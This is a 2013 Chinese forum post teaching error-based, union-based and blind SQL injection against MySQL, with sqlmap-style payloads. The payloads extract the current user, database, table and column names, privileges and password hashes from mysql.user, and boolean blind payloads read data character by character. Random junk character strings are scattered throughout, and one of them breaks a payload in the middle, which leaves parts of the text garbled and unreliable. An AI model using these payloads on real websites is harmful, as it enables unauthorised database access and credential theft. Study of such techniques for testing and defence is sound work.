放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。. Z: @& o$ u1 R
5 N+ E, n+ l# o/ ^' r7 ]0 z* P这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
, P) r2 r3 x x2 T6 p2 x $ B5 I% ]- h$ v, ?. y1 |$ Y
分类标准 分类 备注
0 ~/ t8 }9 D; t( i! `按字段类型 整型注入,字符型注入
% }# l( D; {" A) y1 B* n按出现的位置 get注入,post注入,cookie注入,http header注入
% @1 J" N/ z/ d& b! L2 W5 H0 P然而高级注入是这样的
m: I7 e, g. G) M4 x5 j. Y 2 T. ^& U" ]! O/ d$ D3 R) Q
高级注入分类 条件9 q7 i' u2 x, b" c# L5 M& s
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
2 L4 u5 W- P- G$ D# aunion-based sql 能够使用union,存在数据库,表结构! X7 v/ O2 A. U$ D1 p, _. Z
blind sql 存在注入
2 ]) @' C4 u" U' D! B8 d我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。' T# o7 _% g, f3 p3 b4 \
$ r. Y1 n2 F4 I% o' }好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火 e4 C1 r9 v8 s5 H. b
: C& I1 _1 b, f. ], n6 x9 p附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。# r6 ~7 D5 ~! ~4 {+ @
7 z9 @, Q. ]: V: K3 ]' V这里用mysql说明
6 u. P+ [7 v8 s( y! K / R! c' e i8 B4 J4 y' O
e注入坛子里很多了,请看戳我或者再戳我0 G7 [% }$ d9 d3 ]; ]
) b( V! Z8 E1 ^8 o+ Pu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
7 v2 N# j# p1 f" y5 C4 v
" P5 s' S& P; M0 t" a8 x获取当前数据库用户名
2 \" y# S) y0 C. E$ ~* l) y$ p% w4 c ' W7 U- S& [/ X4 l# ?% S. H* C0 k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C: n1 X+ e, w5 O- ^
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL+ d, ^) Y* X3 H3 ^
L, NULL#
$ |. f: h) h: Z4 }, V' ~) |3 J8 Q注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。: ?& t( H5 d A4 b( n
( E' |+ E) r* x" k: h获取数据库名 { e% x9 V) u
! r4 S% D* g/ X3 P% S* t' ~; @
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
4 t5 `7 C b \" j( l获取所有用户名
9 k7 G% a4 S# C) W% L4 X, d7 q % y. Q2 Q7 w7 H* j8 k" v, f; u
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
$ |* f h' a/ M" O3 ] `查看当前用户权限
7 G) e" H- `/ V4 i
7 H+ O, |: R4 E. g9 D5 \6 sUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#) h7 N- ~) Y# w9 n" P% i
尝试获取密码,当然需要有能读mysql数据库的权限3 \) Y5 N3 p) U( P7 d9 Z# }" c0 T
7 p$ q! I$ D0 c/ iUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#; L; N" ?, W1 W$ [4 }- N
获取表名,limit什么的自己搞啦3 x, f4 D' }5 t& C3 p
/ u' Y1 _2 L% c! K4 vUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
7 C" @' C O6 o" s获取字段名及其类型
( o% l7 F$ Q; P1 K; X8 `UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
7 b/ n$ n5 J* T/ E: S4 E
& h& _+ k: ~$ ~4 U, Ib注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
" B$ n. h5 Y; g: z$ i/ R - F z/ q0 u3 [
如:
6 f2 E! ^6 E4 S& E! m: S9 }获取当前用户名/ Y/ w/ T# v3 Z2 Z+ Y: A. d D
4 q7 b8 }, k" S3 G
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
" U* ]/ z2 h4 o0 x, P获取当前数据库2 T" M4 A$ z3 {/ L$ o1 Q' \
/ Q' ]2 T3 R# h0 Q. z) X
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106) C+ ]/ G5 a) Z: \4 @ K
获取表名* ^8 z) I$ [) ~$ Y7 q
3 f- L( C2 k7 K- b$ O! B( `1 eAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51! A. t! N( c& T# C
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。. _7 v: v9 h2 B
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
. Q+ s0 @" _8 Z) V! [' Q爆表% h. ~' ]8 z. v0 d, T
' q) `! V1 ]# H& t' rAND EXISTS(select * from table)! V* q0 _" c" Q% x& }( e3 @
爆字段
. W) f8 |2 O1 T. a $ R* u- O9 z7 A% T6 Z! ?
AND EXISTS(select pwd from table)9 l% a0 T, T4 `- D( A* S
盲注的变化就比较多了,由于篇幅,只是举个例子而已。, H" z4 o. Q) q
; A+ ?% D( O' c
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。' p" F) @3 u4 G: w+ t
|
发表于 2013-7-16 20:31:26
收藏
支持
反对